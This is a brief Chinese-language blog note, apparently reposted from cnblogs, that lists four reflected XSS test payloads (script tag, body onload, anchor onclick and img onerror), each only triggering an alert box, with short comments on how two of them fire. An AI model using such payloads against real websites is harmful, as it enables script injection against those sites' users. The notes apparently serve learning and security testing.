XSS命令笔记【待更新】

反射型XSS

  • <script>alert(‘xss’)</script>
  • <body onload=alert('xss')>
  • <a href='' onclick=alert('xss')>click</a>    //增加一个click按钮,点击执行
  • <img src="#" onerror=alert('xss')>    //src地址为空(或错误地址),然后执行onerror的内容

猜你喜欢

转载自www.cnblogs.com/xXDw/p/12423131.html